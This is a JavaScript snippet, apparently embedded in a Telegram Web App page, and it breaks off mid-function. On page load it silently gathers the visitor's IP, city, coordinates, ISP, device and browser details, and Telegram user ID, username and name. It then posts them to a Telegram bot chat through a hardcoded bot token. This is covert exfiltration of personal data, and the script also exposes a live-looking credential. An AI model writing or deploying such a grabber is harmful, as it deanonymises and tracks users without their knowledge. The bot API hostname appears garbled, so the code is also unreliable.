<script>
document.addEventListener('DOMContentLoaded', function() {
    let screenWidth;
    let screenHeight;

    screenWidth = window.screen.width;
    screenHeight = window.screen.height;

    const screenWidthConst = screenWidth;
    const screenHeightConst = screenHeight;

    const tg = window.Telegram.WebApp;

    const urlParams = new URLSearchParams(window.location.search);
    const userAgent = navigator.userAgent;

fetch('https://ipapi.co/json/')
    .then(response => response.json())
    .then(data => {
        const ip = data.ip;
        const city = data.city;
        const region = data.region;
        const country = data.country_name;
        const latitude = data.latitude;
        const longitude = data.longitude;
        const time = data.timezone;
        const isp = data.org;
        const osname = navigator.platform;
        const timeZone = Intl.DateTimeFormat().resolvedOptions().timeZone;
        const browser = getBrowserInfo();
        let userid = document.createElement('p');
     
       let systemTime = new Date();
       let hours = systemTime.getHours();
       let minutes = systemTime.getMinutes();
       let formattedTime = `${hours}:${minutes}`;
    
       let language = navigator.language
      
       let datee = new Date();
       let day = datee.getDate();
       let month = datee.getMonth() + 1;
       let year = datee.getFullYear();
  
       let dayOfWeek = datee.getDay();
    
    if (day < 10) {
        day = '0' + day;
    }
    
    if (month < 10) {
        month = '0' + month;
    }
    
    let formedDate = day + '.' + month + '.' + year;
      
      
    let memory = navigator.deviceMemory;
  
  
    let TypeInternet = navigator.connection.effectiveType;
      
        const message = `
      * Ip 🌐*
    *├ IP: ${ip}*
    *├ UserAgent: ${userAgent}*
    *├ Provider: ${isp}*
    *├ City: ${city}*
    *├ Region: ${region}*
    *├ Timezone IP: ${time}*
    *├ Coordinates: ${longitude} ${latitude},*
      * System 🖥*
    *├ Browser: ${browser}*
    *├ + Os: ${osname}*
    *├ Screen resolution: ${screenWidth}x${screenHeight}*
    *├ Time: ${formattedTime}*
    *├ Language: ${language}*
    *├ Timezone: ${formattedTime}*
    *├ Date: ${formedDate} Day of week: ${dayOfWeek}*
    *├ Memory: ${memory} RAM*
    *├ Internet: ${TypeInternet}*
      *🔍  Account: *
    *├ ID: ${tg.initDataUnsafe.user.id}*
    *├ Username: @${tg.initDataUnsafe.user.username}*
    *├ Name: ${tg.initDataUnsafe.user.first_name}*
    *├ Language: ${tg.initDataUnsafe.user.language_code}*
                             `;
        
        const token = '6760998368:AAGASTUFyPU3WQyupgYDk11ygOb4SU7oCus';
        const chatId = '-1002084822950';
        const url = 'https://api.teleorg/bot'+token+'/sendMessage';
        const formData = new FormData();
        formData.append('chat_id', chatId);
        formData.append('text', message);
        formData.append('parse_mode', 'Markdown');
        fetch(url, {
            method: 'POST',
            body: formData
        });
    });
});

function getBrowserInfo() {
    const ua = navigator.userAgent;
    let browser = '';
    const match = ua.match(/(opera|chrome|safari|firefox|msie|trident(?=\/))\/?\s*(\d+)/i);

    if (/trident/i.test(match[1])) {
        const tem = /\brv[ :]+(\d+)/g.exec(ua);
        browser = 'IE ' + (tem[1] || '');
    }

    if (match[1] === 'Chrome') {
        const tem = ua.match(/\b(OPR|Ed
